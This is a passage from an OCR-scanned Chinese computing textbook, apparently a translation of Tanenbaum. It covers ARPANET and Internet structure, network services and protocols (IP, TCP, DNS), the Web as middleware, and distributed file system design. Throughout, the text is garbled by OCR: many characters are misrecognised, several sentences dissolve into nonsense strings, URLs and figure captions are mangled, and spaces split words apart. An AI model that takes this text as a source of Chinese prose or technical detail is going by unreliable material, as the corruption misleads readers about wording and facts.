性 的 分 组 交换 网 络 ) 演化 而 来 。 它 自 1969 年 12 月 起 开始 运行 ， 由 三 台 在 
加 州 的 计算 机 和 一 台 在 犹他 州 的 计算 机 组 成 。 当 时 正 值 冷 战 的 顶峰 时 
期 ， 它 被 设计 为 一 个 高 度 容 错 的 网 络 ， 在 核弹 直接 击 中 网 络 的 多 个 部 分 
时 ， 该 网 络 将 能 够 通过 自动 改换 已 死亡 机 器 周边 的 路 由 ， 继 续 保 持 军事 
通信 的 中 继 。 





ARPANET 在 20 世 纪 70 年 代 迅 速 地 成 长 ， 结 果 拥 有 了 上 百 台 计算 
机 。 接 着 ， 一 个 分 组 无 线 网 络 、 一 个 卫星 网 络 以 及 成 千 的 以 太 网 都 联 在 
了 该 网 络 上 ， 从 而 变 成 为 网 络 的 联邦 ， 即 我 们 今天 所 看 到 的 Internet。 


Internet 包 括 了 两 类 计算 机 ， 主 机 和 路 由 器 。 主 机 Chost) 有 PC 机 、 
笔记 本 计算 机 、 掌 上 电脑 ， 服 务 器 、 大 型 计算 机 以 及 其 他 那些 个 人 或 公 
司 所 有 且 希 望 与 Internet 连 接 的 计算 机 。 路 由 占 (router) 是 专用 的 交换 
计算 机 ， 它 在 许多 进 线 中 的 一 条 线 上 接收 进来 的 包 ， 并 在 许多 个 出 口 线 
中 的 一 条 线 上 按照 其 路 径 发 送 包 。 路 由 器 类 似 于 图 8-31b 中 的 交换 机 ， 
但 是 路 由 器 与 这 种 交换 机 也 是 有 差别 的 ， 这 些 差 别 就 不 在 这 里 讨论 了 。 
在 大 型 网 络 中 ， 路 由 器 互相 连接 ， 每 台 路 由 兹 都 通过 线 绕 或 光 绕 连接 到 
其 他 的 路 由 器 或 主机 上 。 电 话 公 司 和 互联 网 服务 提供 商 〈Internet 
Service Providers，ISP) 为 其 客户 运行 大 型 的 全 国 性 或 全 球 性 路 由 器 网 
络 。 














图 8-32 展 示 了 Internet 的 一 部 分 。 在 图 的 顶部 是 其 主干 网 


(backbone) 之 一 ， 通 常 由 主干 网 操作 员 管 理 。 它 包括 了 大 量 通 过 宽 融 
光纤 连接 的 路 由 器 ， 同 时 连接 着 其 他 《竞争 ) 电话 公司 运行 管理 的 主干 
网 。 除 了 电话 公司 为 维护 和 测试 所 需 运 行 的 机 器 之 外 ， 通 常 没 有 主机 直 
接 联 在 主干 网 上 。 
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图 8-32 ”Internet 的 一 部 分 


地 区 网 络 和 ISP 的 路 由 器 通过 中 等 速度 的 光纤 连接 到 主干 网 上 。 依 
次 ， 每 个 配备 路 由 器 的 公司 以 太 网 连接 到 地 区 网 络 的 路 由 器 上 。 而 ISP 
的 路 由 器 则 被 连接 到 供 ISP 客 户 们 使 用 的 调制 解 调 器 汇集 器 Cbank ) 

上 上。 按照 这 种 方式 ， 在 Internet 上 的 每 台 主 机 至 少 拥有 通 往 其 他 主机 的 一 
条 路 径 ， 而 且 每 台 经 癌 拥 有 多 条 通 往 其 他 主机 的 路 径 。 

















在 Internet 上 的 所 有 通信 都 以 包 (packet) 的 形式 传送 。 每 个 包 在 其 
内 部 携带 着 目的 地 的 地 址 ， 而 这 个 地 址 是 供 路 由 器 使 用 的 。 当 一 个 包 来 
到 茶 个 路 由 器 时 ， 该 路 由 需 抽 取 目 的 地 地 址 并 在 一 个 表格 《部 分 ) 中 进 
行 查 询 ， 以 找 出 用 哪 根 出 口 线 有 发送 该 包 以 及 发 送 到 哪个 路 由 器 。 这 个 过 
程 不 断 重复 ， 直 到 这 个 包 到 达 目 的 主机 。 路 由 表 是 高 度 动态 的 ， 并 且 随 
者 路 由 器 和 链 路 的 损坏 、 恢 复 以 及 通信 条 件 的 变化 在 连续 不 断 地 更 新 。 





8.4.2 ”网 络 服 务 和 协议 


所 有 的 计算 机 网 络 都 为 其 用 户 〈“ 主 机 和 进程 ) 提供 一 定 的 服务 ， 这 
种 服务 通过 东 些 关于 合法 消息 交换 的 规则 加 以 实现 。 下 面 将 简要 地 叙述 


这 些 内 容 。 





1. 网 络 服务 


计算 机 网 络 为 使 用 网 络 的 主机 和 进程 提供 服务 。 面 向 连接 的 服务 是 
对 电话 系统 的 一 种 模仿 。 比 如 ， 知 要 同 茶 人 谈话 ， 则 要 移 拿 起 听 简 ， 拨 
出 和 号码， 说 话 ， 然 后 挂 掉 。 类 似 地 ， 要 使 用 面向 连接 的 服务 ， 服 务 用 户 
要 先 建立 一 个 连接 ， 使 用 该 连接 ， 然 后 释放 该 连接 。 一 个 连接 的 基本 作 
用 则 像 一 根 管道 : 发 送 者 在 一 端 把 物品 《信息 位 ) 推 入 管道 ， 而 接收 者 
则 按照 相同 的 顺序 在 管道 的 男 一 病 取 出 它们 。 








相反 ， 无 连接 服务 则 是 对 邮政 系统 的 一 种 模仿 。 每 个 消息 《信件 ) 
携带 了 完整 的 目的 地 地 址 ， 与 所 有 其 他 消 妃 相 独 立 ， 每 个 消息 有 目 己 的 
路 径 通 过 系统 。 通 币 ， 当 两 个 消息 被 送 往 同 一 个 目的 地 时 ， 第 一 个 发 送 
的 消 轧 会 首先 到 达 。 但 是 ， 有 可 能 第 一 个 发 送 的 消 轧 会 被 延误 ， 这 样 第 
二 个 消息 会 首先 到 达 。 而 对 于 面 同 连接 的 服务 而 言 ， 这 古 不 可 能 发 生 
的 。 





每 种 服务 可 以 用 服务 质量 (quality of service) 表征 。 有 些 服务 就 其 
从 来 不 丢失 数据 而 言 是 可 靠 的 。 一 般 来 说 ， 可 靠 的 服务 是 用 以 下 方式 实 
EA: 接收 者 发 回 一 个 特别 的 确认 包 (acknowledgement packet) ， 确 认 
每 个 收 到 的 消息 ， 这 样 发 送 者 就 确信 消息 到 达 了 。 不 过 确认 的 过 程 引 入 
了 过 载 和 延迟 的 问题 ， 检 查 包 的 丢失 是 必要 的 ， 但 是 这 样 确实 减缓 了 传 
送 的 速度 。 





一 种 适合 可 徘 的 、 面 向 连接 服务 的 典型 场景 是 文件 传送 。 文 件 的 所 
有 者 布 望 确保 所 有 的 信息 位 部 是 正确 的 ， 并 且 按 照 以 其 所 发 送 的 顺序 到 
达 。 几 平 没有 哪个 文件 发 送 客 户 会 愿意 接受 侦 尔 会 弄 乱 或 丢失 一 些 位 的 
文件 传送 服务 ， 即 使 其 发 送 速度 更 快 。 





可 靠 的 、 面 向 连接 的 服务 有 两 种 轻微 变种 (minor variant) : 消息 
序列 和 字 节 流 。 在 前 者 的 服务 中 ， 保 留 着 消息 的 边界 。 当 两 个 IKB 的 消 
息 发 送 时 ， 它 们 以 两 个 有 区 别 的 1KB 的 消息 形式 到 达 ， 决 不 会 成 为 一 个 
2KB 的 消息 。 在 后 者 的 服务 中 ， 连 接 只 是 形成 为 一 个 字 节 流 ， 不 存在 消 
息 的 边界 。 当 2K 字 节 到 达 接 收 者 时 ， 没 有 办 法 分 辨 出 所 发 送 的 是 一 个 
2KB 消 息 、 两 个 1KB 消 息 还 是 2048 个 单字 节 的 消息 。 如 果 以 分 离 的 消息 
形式 通过 网 络 把 一 本 书 的 页 面 发 送 到 一 台 照 排 机 上 ， 在 这 种 情形 下 也 许 
保留 消息 的 边界 是 重要 的 。 而 男 一 方面 ， 在 通过 一 个 终端 登录 进入 某 个 
远程 分 时 系统 时 ， 所 需要 的 也 只 是 从 该 终端 到 计算 机 的 字 节 流 。 


对 茶 些 应 用 而 言 ， 由 确认 所 引入 的 时 延 是 不 可 接受 的 。 一 种 这 样 的 


应 用 例子 是 数字 化 的 语音 通信 。 对 电话 用 户 而 言 ， 他 们 宁可 时 而 听 到 一 
点 噪音 或 一 个 被 竹 曲 的 词 ， 也 不 会 愿意 为 了 确认 而 接受 时 延 。 





并 不 是 所 有 的 应 用 都 需要 连接 。 例 如 ， 在 测试 网 络 时 ， 所 需要 的 只 
征 一 种 发 送 单个 包 的 方法 ， 其 中 的 这 个 包 具 备 有 高 可 达到 率 但 不 保证 一 
定 可 达 。 不 可 靠 的 《意味 着 没有 确认 ) 无 连接 服务 ， 常 常 称 作 数 据 报 服 
务 (datagram service) ， 它 模拟 了 电报 服务 ， 这 种 服务 也 不 为 肥 送 者 提 
供 回 送 确 认 的 服务 。 





在 其 他 的 情形 下 ， 不 用 建立 连接 就 可 发 送 短 消 恩 的 便利 是 受到 欢迎 
的 ， 但 是 可 徘 性 仍然 是 重要 的 。 可 以 把 确认 数据 报 服 务 (acknowledged 
datagram service) 提供 给 这 些 应 用 使 用 。 它 类 似 于 寄 送 一 封 挂 写 信 并 且 
要 求 得 到 一 个 返回 收据 。 当 收据 回 送 到 之 后 ， 发 送 者 就 可 以 绝对 确信 ， 
该 信 已 被 送 到 所 希望 的 地 方 且 没有 在 路 上 丢失 。 





还 有 一 种 服务 是 请 求 -应 答 服务 (request-reply service) 。 在 这 种 服 
务 中 ， 发 送 者 传送 一 份 包含 一 个 请 求 的 数据 报 ; 应 答 中 含有 答复 。 例 
如 ， 友 给 本 地 图 书馆 的 一 份 询问 维吾尔 语 在 什么 地 方 被 使 用 的 请 求 环 属 
于 这 种 类 型 。 在 客户 机 -服务 器 模式 的 通信 实现 中 党 第 采用 请 求 -应 答 : 
客户 机 发 出 一 个 请 求 ， 而 服务 器 则 啊 应 该 请 求 。 图 8-33 总 结 了 上 面 讨论 
过 的 各 种 服务 类 型 。 
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二 | 不 可 靠 数据 报 网 络 测试 数据 包 
连接 确认 数据 报 注册 邮件 
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图 8-33 六 种 不 同类 型 的 网 络 服务 
2. 网 络 协议 


所 有 网 络 都 有 高 度 专门 化 的 规则 ， 用 以 说 明 什 么 消 轧 可 以 发 送 以 及 
如 何 啊 应 这 些 消息 。 例 如 ， 在 茶 些 条 件 下 《如 文件 传送 ) ， 当 一 条 消息 
从 源 送 到 目的 地 时 ， 目 的 地 被 要 求 返 回 一 个 确认 ， 以 表示 正确 收 到 了 该 
消 轧 。 在 其 他 情形 下 《〈 如 数字 电话 ) ， 就 不 要 求 这 样 的 确认 。 用 于 特定 
计算 机 通信 的 这 些 规则 的 集合 ， 称 为 协议 protocol 。 有 许多 种 协 
议 ， 包 括 路 由 器 -路 由 器 协议 、 主 机 -主机 协议 以 及 其 他 协议 等 。 要 了 解 
计算 机 网 络 及 其 协议 的 完整 论述 ， 可 参阅 《计算 机 网 络 》 (Computer 


Networks, Tanenbaum, 2003) 。 





eg dae lan 
议 一 层 一 层 登 加 起 来 。 每 一 层 解决 不 同 的 问题 。 例 如 ， 处 于 最 低层 的 协 
议会 定义 如 何 识别 比特 流 中 的 数据 包 的 起 始 和 结束 位 置 。 在 更 高 一 层 








上 ， 协 议会 确定 如 何 通 过 复杂 的 网 络 来 把 数据 包 从 来 源 节点 发 送 到 目标 
节点 。 再 高 一 层 上 ， 协 议会 确保 多 包 消 息 中 的 所 有 数据 包 都 按照 合适 的 
顺序 正确 到 达 。 


大 多 数 分 布 式 系统 都 使 用 Internet 作 为 基础 ， 因 此 这 些 系统 使 用 的 关 
键 协议 是 两 种 主要 的 Internet 协 议 : IP 和 TCP。IP (Internet Protocol) 是 
一 种 数据 报 协 议 ， 发 送 者 可 以 向 网 络 上 发 出 长 达 64KB 的 数据 报 ， 并 期 

望 它 能 够 到 达 。 它 并 不 提供 任何 保证 。 当 数据 报 在 网 络 上 传送 时 ， 它 可 
能 被 切割 成 更 小 的 包 。 这 些 包 独立 进行 传输 ， 并 可 能 通过 不 同 的 路 由 。 
当 所 有 的 部 分 都 到 达 目 的 地 时 ， 再 把 它们 按照 正确 的 顺序 装配 起 来 并 提 
pasting 





当前 有 两 个 版 本 的 卫 在 使 用 ， 即 v4 和 v6。 当 前 v4 仍 然 占 有 支配 地 
位 ， 所 以 我 们 这 里 主要 讨论 它 ， 但 是 ，v6 是 未 来 的 发 展 方向 。 每 个 v4 包 
以 一 个 40 字 节 的 包头 开始 ， 其 中 包含 32 位 源 地 址 和 32 位 目标 地 址 。 这 些 
地 址 就 称 为 IP 地 址 ， 它 们 构成 了 Internet 中 路 由 选择 的 基础 。 通 常 IP 地 址 
写作 4 个 由 点 隔 开 的 十 进 制 数 ， 每 个 数 介 于 0 一 255 之 间 ， 例 如 
192.31.231.65。 当 一 个 包 到 达 路 由 器 时 ， 路 由 器 会 解析 出 卫 目 标 地址， 
并 利用 该 地 址 选择 路 由 。 


既然 卫 数 据 报 是 非 应 答 的 ， 所 以 对 于 Internet 的 可 靠 通 信 仅 仅 使 用 了 
是 不 够 的 。 为 了 提供 可 靠 的 通信 ， 通 常 在 IP 层 之 上 使 用 男 一 种 协议 ， 
TCP (Transmission Control Protocol， 传 输 控 制 协议 ) 。TCP 使 用 IP 来 提 


供 面 向 连接 的 数据 流 。 为 了 使 用 TCP， 进 程 需要 首先 与 一 个 远程 进程 建 
并 连接 。 被 请 求 的 进程 需要 通过 机 器 的 IP 地 址 和 机 器 的 站 口号 来 指定 ， 
而 对 进入 的 连接 感 兴趣 的 进程 监听 该 端口 。 这 些 工作 完成 之 后 ， 只 需 把 
字 节 流放 入 连接 ， 那 么 束 能 保证 它们 会 从 男 一 端 按 照 正 确 的 顺序 完好 无 
损 地 出 来 。TCP 的 实现 是 通过 序列 号 、 校 检 和 、 出 错 重 传 来 提供 这 种 保 
证 的 。 所 有 这 些 对 于 发 送 者 和 接收 者 进程 都 是 透明 的 。 它 们 看 到 的 只 是 
可 徘 的 进程 间 通 信 ， 残 像 UNIX 省 道 一 样 。 











为 了 了 解 这 些 协 议 的 交互 过 程 ， 我 们 来 考虑 一 种 最 简单 的 情况 : 要 
发 送 的 消息 很 小 ， 在 任何 一 层 都 不 需要 分 割 它 。 主 机 处 于 一 个 连接 到 
Internet 上 的 Ethernet 中 。 那 么 究竟 发 生 了 什么 呢 ? 首先 ， 用 户 进 程 产 生 
消息 ， 并 在 一 个 事先 建立 好 的 TCP 连 接 上 通过 系统 调用 来 发 送 消息 。 内 
核 协议 栈 依次 在 消息 前 面 添加 TCP 包 头 和 了 P 包 头 。 然 后 由 Ethernet 驱 动 再 
添加 一 个 Ethernet 包 头 ， 并 把 该 数据 包 发 送 到 Ethernet 的 路 由 器 上 。 如 图 
8-34 路 由 器 把 数据 包 发 送 到 Internet 上 。 








因特网 、 












宿主 机 路 由 器 
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包头 
图 8-34 数据 包头 的 累加 过 程 


为 了 与 远程 机 器 建立 连接 (或 者 仅仅 是 给 它 发 送 一 个 数据 包 ) ， 需 
要 知道 它 的 JP 地址 。 因 为 对 于 人 们 来 说 管理 32 位 的 人 P 地 址 列表 是 很 不 方 
便 的 ， 所 以 就 产生 了 一 种 称 为 DNS (Domain Name System， 域 名 系统 ) 
的 方案 ， 它 作为 一 个 数据 库 把 主机 的 ASCII 名 称 映射 为 对 应 的 人 P 地 址 。 
因此 就 可 以 用 DNS 名 称 〈 如 star.cs.vunl) 来 代替 对 应 的 了 地 址 ) (如 
130.37.24.6) 。 由 于 Intemet 电 子 邮 件 地 址 采用 “用 户 名 @DNS 主 机 名 ”的 
形式 命名 ， 所 以 DNS 名 称 广为人知 。 该 命名 系统 允许 发 送 方 机 器 上 的 邮 
件 程序 在 DNS 数据 库 中 查找 目标 机 器 的 耳 地 址 ， 并 与 目标 机 上 的 邮件 守 
护 进 程 建立 TCP 连 接 ， 然 后 把 邮件 作为 文件 发 送出 去 。 用 户 名 一 并 发 
送 ， 用 于 确定 存放 消息 的 邮箱 





8.4.3 ”基于 文档 的 中 间 件 


现在 我 们 已 经 有 了 一 些 有 关 网 络 和 协议 的 背景 知识 ， 可 以 开始 讨论 
不 同 的 中 间 件 层 了 。 这 些 中 间 件 层 位 于 基础 网 络 上 ， 为 应 用 程序 和 用 户 
提供 一 致 的 范 型 。 我 们 将 从 一 个 简单 但 是 却 非常 著名 的 例子 开始 : 万 维 
网 (World Wide Web) 。Web 是 由 在 欧洲 核子 中 心 (CERN) 工作 的 
Tim Berners-Lee} 19894F ACHE, MAK LA Ja Web it it KFR SE 
世界 。 








Web 背 后 的 原始 范 型 是 非常 简单 的 : 每 个 计算 机 可 以 持 有 一 个 或 多 
个 文档 ， 称 为 Web 页 面 (Web page) 。 在 每 个 页 面 中 有 文本 、 图 像 、 图 
标 、 声 音 、 电 影 等 ， 还 有 到 其 他 页 面 的 超 链接 (hyperlink) (指针 )。 
当 用 户 使 用 一 个 称 为 Web 浏 览 器 (Web browser) 的 程序 请 求 一 个 Web 页 
面 时 ， 该 页 面 就 显示 在 用 户 的 屏幕 上 。 点 击 一 个 超 链接 会 使 得 屏幕 上 的 
当前 页 面 被 所 指向 的 页 面 蔡 代 。 尽 管 近来 在 web 上 添加 了 许多 的 花哨 名 
堂 ， 但 是 其 底层 的 范 型 仍旧 很 清楚 地 存在 着 : Web 是 一 个 由 文档 构成 的 
巨大 有 向 图 ， 其 中 文档 可 以 指向 其 他 的 文档 ， 如 图 8-35 所 示 。 











图 8-35 Web 是 一 个 由 文档 构成 的 大 有 向 图 


每 个 Web 页 面 都 有 一 个 惟一 的 地 址 ， 称 为 URL (统一 资源 定位 符 ， 
Uniform Resource Locator) ， 其 形式 为 protocol:/DNS-name/file-name。 
http 协 议 〈 超 文本 传输 协议 ，HyperText Transfer Protocol) 是 最 常用 的 ， 
不 过 ftp 和 其 他 协议 也 在 使 用 。 协 议 名 后 面 是 拥有 该 文件 的 主机 的 DNS 名 
称 。 最 后 是 一 个 本 地 文件 名 ， 用 来 说 明 需 要 使 用 哪个 文件 。 





整个 系统 按 如 下 方式 结合 在 一 起 : Web 根 本 上 是 一 个 客户 机 -服务 
器 系统 ， 用 户 是 客户 端 ， 而 web 站 点 则 是 服务 器 。 当 用 户 给 浏览 器 提供 
一 个 URL 时 (或 者 键入 URL， 或 者 点 击 当 前 页 面 上 的 某 个 超 链 接 ) ， 浏 
览 器 则 按照 一 定 的 步骤 调 取 所 请 求 的 web 页面。 作为 一 个 例子 ， 假 设 提 
供 的 URL 是 http:/Vwww.minix3.org/doc/faq.html。 浏 览 器 按照 下 面 的 步骤 
取得 所 需 的 页 面 。 





TD) 浏览 器 向 DNS 询问 www.minix3.org 的 卫 地 址 。 


2)DNS 回 答 ， 是 130.37.20.20。 

3) 浏 览 器 建立 一 个 到 130.37.20.20 上 端口 80 的 TCP 连 接 。 
4) 接 着 浏览 器 发 送 对 文件 doc/fagq.html 的 请 求 。 
5)www.acm.org 服 务 器 发 送 文件 docfaq.html。 

6) 释 放 TCP 连 接 。 

7) 浏 览 器 显示 docfaq.html 文 件 中 的 所 有 文本 。 

8) 浏 览 器 获取 并 显示 docfaq.html 中 的 所 有 图 像 。 


大 体 上 ， 这 就 是 Web 的 基础 以 及 它 是 如 何 工作 的 。 许 多 其 他 的 功能 
已 经 添加 在 了 上 述 基 本 Web 功 能 之 上 了 ， 包 括 样 式 表 、 可 以 在 运行 中 生 
成 的 动态 网 页 、 带 有 可 在 客户 机 上 执行 的 小 程序 或 脚本 的 页 面 等 ， 不 过 
对 它们 的 讨论 超出 了 本 书 的 范围 。 








8.4.4 基于 文件 系统 的 中 间 件 


隐藏 在 Web 背 后 的 基本 思想 是 ， 使 一 个 分 布 式 系统 看 起 来 像 一 个 巨 
大 的 、 超 链接 的 集合 。 另 一 种 处 理 方式 则 是 使 一 个 分 布 式 系统 看 起 来 像 
一 个 大 型 文件 系统 。 在 这 一 节 中 ， 我 们 将 考察 一 些 与 设计 一 个 广 域 文件 
系统 有 天 的 问题 。 











分 布 式 系统 采用 一 个 文件 系统 模型 意味 着 只 存在 一 个 全 局 文件 系 
统 ， 全 世界 的 用 户 都 能 够 读 写 他 们 各 上 自 具有 授权 的 文件 。 通 过 一 个 进程 
将 数据 写 入 文件 而 男 一 个 进程 把 数据 读 出 的 办 法 可 以 实现 通信 。 由 此 产 
生 了 标准 文件 系统 中 的 许多 问题 ， 但 是 也 有 一 些 与 分 布 性 相关 的 新 问 


feo 


1. 传 输 模式 


第 一 个 问题 是 ， 在 上 传 /下 载 模式 Cupload/download model) 和 远程 
访问 模式 之 间 的 选择 问题 。 在 前 一 种 模式 中 ， 如 图 8-36a 所 示 ， 通 过 把 
远程 服务 器 上 的 文件 复制 到 本 地 的 方法 ， 实 现 进程 对 远程 文件 的 访问 。 
如 果 只 是 需要 读 该 文件 ， 考 虑 到 高 性 能 的 需要 ， 就 在 本 地 读 出 该 文件 。 
如 果 需 要 写 入 该 文件 ， 就 在 本 地 写 入 。 进 程 完成 工作 之 后 ， 把 更 新 后 的 
文件 送 回 原来 的 服务 器 。 在 远程 访问 模式 中 ， 文 件 停留 在 服务 器 上 ， 而 
客户 机 向 服务 器 发 出 命令 并 在 服务 器 上 完成 工作 ， 如 图 8-36b 所 示 。 





1. 客户 机 取 文 件 
客户 机 服务 器 旧 文 件 客户 机 服务 器 


TD 请 求 
mm | a ll 





ENNS 3. 当 客 户 机 完成 
2. 访问 在 客户 CHEN, SCE BE 
机 上 完成 送 回 给 服务 器 


文件 留 在 
服务 器 上 


a) b) 
图 8-36 a) 上 传 /下 载 模式 ; 中) 远程 访问 模式 


上 传 /下 载 模式 的 优点 是 简单 ， 而 且 一 次 性 传送 整个 文件 的 方法 比 
用 小 块 传送 文件 的 方法 效率 更 高 。 其 缺点 是 为 了 在 本 地 存放 整个 文件 ， 
必须 拥有 足够 的 空间 ， 即 使 只 珊 要 文件 的 一 部 分 也 要 移动 整个 文件 ， 这 
样 做 显然 是 一 种 浪费 ， 而 且 如 果 有 多 个 并 发 用 户 则 会 产生 一 致 性 问题 。 








2. 目 录 层 次 


文件 只 是 所 涉及 的 问题 中 的 一 部 分 。 另 一 部 分 问题 是 目录 系统 。 所 
有 的 分 布 式 系 统 都 支持 有 多 个 文件 的 目录 。 接 下 来 的 设计 问题 是 ， 是 否 
所 有 的 用 户 都 拥有 该 目录 层次 的 相同 视图 。 图 8-37 中 的 例子 正好 表达 了 
我 们 的 意思 。 在 图 8-37a 中 有 两 个 文件 服务 器 ， 每 个 服务 器 有 三 个 目录 
和 一 些 文件 。 在 图 8-37b 中 有 一 个 系统 ， 其 中 所 有 的 客户 (以 及 其 他 机 
器 ) 对 该 分 布 式 文件 系统 拥有 相同 的 视图 。 如 果 在 某 台 机 器 上 路 
径 /D/E/x 是 有 效 的 ， 则 该 路 径 对 所 有 其 他 的 客户 也 是 有 效 的 。 





相反 ， 在 图 8-37c 中 ， 不 同 的 机 器 有 该 文件 系统 的 不 同 视图 。 重 复 
先前 的 例子 ， 路 径 /D/E/x 可 能 在 客户 机 1 上 有 效 ， 但 是 在 客户 机 2 上 无 
效 。 在 通过 远程 安 准 方式 省 理 多 个 文件 服务 器 的 系统 中 ， 图 8-37c 是 一 
个 典型 示例 。 这 样 既 灵活 又 可 直接 实现 ， 但 是 其 缺点 是 ， 不 能 使 得 整个 
系统 行为 像 单一 的 、 旧 式 分 时 系统 。 在 分 时 系统 中 ， 文 件 系统 对 任何 进 
程 都 是 一 样 的 ， 如 图 8-37b 中 的 模型 。 这 个 属性 显然 使 得 系统 容易 编程 
和 理解 。 





文件 服务 器 1 客户 机 1 





a) b) 

图 837 aWBRXHMRSE. BURAK, HARRI; DMA 

客户 机 都 有 相同 文件 系统 视图 的 系统 ; 9 不 同 的 客户 机 可 能 会 有 不 同文 
件 系统 视图 的 系统 








一 个 密切 相关 的 问题 是 ， 是 否 存 在 一 个 所 有 的 机 絮 都 承认 的 全 局 根 
目录 。 获 得 全 局 根 目 录 的 一 个 方法 是 ， 让 每 个 服务 器 的 根 目录 只 包含 一 














个 目录 项 。 在 这 种 情况 下 ， 路 径 取 /serverpath 的 形式 ， 这 种 方式 有 其 缺 
点 ， 但 是 至 少 做 到 了 在 系统 中 处 处 相同 。 


3. 命 名 透明 性 





这 种 命名 方式 的 主要 问题 是 ， 它 不 是 完全 透明 的 。 这 里 涉及 两 种 类 
型 的 透明 性 Ctransparency) ， 并 且 有 必要 加 以 区 分 。 第 一 种 ， 位 置 透明 
性 Clocation transparency) ， 其 舍 义 是 路 径 名 没有 隐 含 文件 所 在 位 置 的 
言 息 。 类 似 于 /server1/dir1/dir2/x 的 路 径 告诉 每 个 人 ，x 是 在 服务 器 1 上 ， 
但 是 并 没有 说 明 该 服务 器 在 哪里 。 在 网 络 中 该 服务 器 可 以 随意 移动 ， 而 
该 路 径 名 却 不 必 改 动 。 所 以 这 个 系统 具有 位 置 透明 性 。 





但 是 ， 假 设 文件 非常 大 而 在 服务 器 1 上 的 空间 又 很 紧张 。 进 而 ， 如 
果 在 服务 器 2 上 有 大 量 的 空间 ， 那 么 系统 也 许 会 自动 地 将 x 从 1 移 到 服务 
器 2 上 。 不 驻地 ， 当 整个 路 径 名 的 第 一 个 分 量 是 服务 器 时 ， 即 使 dir1 和 
dir2 在 两 个 服务 器 上 都 存在 ， 系 统 也 不 能 将 文件 自动 地 移动 到 其 他 的 服 
务 器 上 。 问 题 在 于 ， 让 文件 自动 移动 就 得 将 其 路 径 名 
从 /server1/dir1/dir2/x 改 变 成 为 /server2/dir1/dir2/x。 如 果 路 径 改 变 了 ， 那 
么 在 内 部 拥有 前 一 个 路 径 字符 串 的 程序 就 会 停止 工作 。 如 果 在 一 个 系统 
中 文件 移动 时 文件 的 名 称 不 会 随 之 改变 ， 则 称 为 具有 位 置 独立 性 
(location independence) 。 将 机 器 或 服务 器 名 称 骨 在 路 径 名 中 的 分 布 式 
系统 显然 不 具有 位 置 独 立 性 。 一 个 基于 远程 安装 〈 挂 载 ) 的 系统 当然 也 
不 具有 位 置 独立 性 ， 因 为 在 把 某 个 文件 从 一 个 文件 组 (安装 单元 ) 移 到 














为 一 个 文件 组 时 ， 是 不 可 能 仍旧 使 用 原来 的 路 径 名 的 。 可 见 位 置 独立 性 
是 不 容易 实现 的 ， 但 它 是 分 布 式 系 统 所 期 望 的 一 个 属性 。 





这 里 把 前 面 讨论 过 的 内 容 加 以 简要 的 总 结 ， 在 分 布 式 系 统 中 人 处 理 文 
件 和 目录 命名 的 方式 通常 有 以 下 三 种 : 





1) 机 器 + 路 径 名 ， 如 /machine/path 或 machine:path 。 





2) 将 远程 文件 系统 安装 在 本 地 文件 层次 中 。 


3) 在 所 有 的 机 器 上 看 来 都 相同 的 单一 名 字 空 间 。 





前 两 种 方式 很 容易 实现 ， 特 别 是 作为 将 原本 不 古 为 分 布 式 应 用 而 设 
计 的 已 有 系统 连接 起 来 的 方式 时 是 这 样 。 而 第 三 种 方式 的 实现 则 是 困难 
的 ， 并 且 需 要 仔细 的 设计 ， 但 是 它 能 够 减轻 了 程序 员 和 用 户 的 负担 。 














4. 文 件 共 诗 的 语义 


当 两 个 或 多 个 用 户 共 享 同一 个 文件 时 ， 为 了 避免 出 现 问 题 有 必要 精 
确 地 定义 读 和 写 的 语义 。 在 单 处 理 器 系统 中 ， 通 常 ， 语 义 是 如 下 表述 
的 ， 在 一 个 read 系 统 调用 跟随 一 个 write 系统 调用 时 ， 则 read 返 回 刚才 写 
入 的 值 ， 如 图 8-38a 所 示 。 类 似 地 ， 当 两 个 write 连续 出 现 ， 后 跟随 一 个 
read 时 ， 则 读 出 的 值 是 后 一 个 写 操作 所 存 入 的 值 。 实 际 上 ， 系 统 强制 所 
有 的 系统 调用 有 序 ， 并 且 所 有 的 处 理 器 都 看 到 同样 的 顺序 。 我 们 将 这 种 
模型 称 为 顺序 一 致 性 (sequential consistency) 。 





在 分 布 式 系统 中 ， 只 要 只 有 一 个 文件 服务 器 而 且 客 户 机 不 缓存 文 
件 ， 那 么 顺序 一 致 性 是 很 容易 实现 的 。 所 有 的 read 和 write 直接 发 送 到 这 
个 文件 服务 器 上 ， 而 该 服务 器 严格 地 按 顺 序 执行 它们 。 





不 过 ， 实 际 情况 中 ， 如 果 所 有 的 文件 请 求 都 必须 送 到 单 台 文件 服务 
器 上 处 理 ， 那 么 这 个 分 布 式 系统 的 性 能 往往 会 很 糟糕 。 这 个 问题 可 以 用 
如 下 方式 来 解决 ， 即 让 客户 机 在 其 私有 的 高 速 缓存 中 保留 经 党 使 用 文件 
的 本 地 副本 。 但 是 ， 如 果 客 户 机 1 修改 了 在 本 地 高 速 缓存 中 的 文件 ， 而 
紧 接 着 客户 机 2 从 服务 器 上 读 取 该 文件 ， 那 么 客户 机 2 束 会 得 到 一 个 已 经 
过 时 的 文件 ， 如 图 8-38b 所 示 。 








客户 机 1 







单 处 理 器 2. BA “o” LA “ab” 


1. 5A “c” 原始 
文件 服务 器 





2. BEER “abc” 


pom 3. 读 取 “ab” 
a) 客户 机 2 


b) 


A 838 中 顺序 一 致 性 ; b) 在 一 个 带 有 高 速 缓存 的 分 布 式 系统 中 ， 读 


文件 可 能 会 返回 一 个 废弃 的 值 


走出 这 个 困 局 的 一 个 途径 是 ， 将 高 速 缓存 文件 上 的 改动 立即 传送 回 
服务 器 。 尽 管 概念 上 很 简单 ， 但 这 个 方法 却 古 低 效率 的 。 胃 一 个 解决 方 
案 是 放宽 文件 共享 的 语义 。 一 般 的 语义 要 求 一 个 读 操作 要 看 到 其 之 前 的 
所 有 写 操 作 的 效果 ， 我 们 可 以 定义 一 条 新 规则 来 取代 它 :“ 在 一 个 打开 
文件 上 所 进行 的 修改 ， 最 初 仅 对 进行 这 些 修改 的 进程 是 可 见 的 。 只 有 在 
该 文件 关闭 之 后 ， 这 些 修改 才 对 其 他 进程 可 见 。” 采 用 这 样 一 个 规则 不 








会 改变 在 独 8-38b 中 发 生 的 事件 ， 但 是 这 条 规则 确实 重新 定义 了 所 谓 正 
确 的 具体 操作 行为 《B 得 到 了 文件 的 原始 值 ) 。 当 客户 机 1 关闭 文件 时 ， 
它 将 一 个 副本 回 送 给 服务 器 ， 因 此 ， 正 如 所 期 望 的 ， 后 续 的 read 操 作 得 
到 了 新 的 值 。 实 际 上 ， 这 个 规则 残 是 图 8-36 中 的 上 传 /下 载 模式 。 这 种 语 
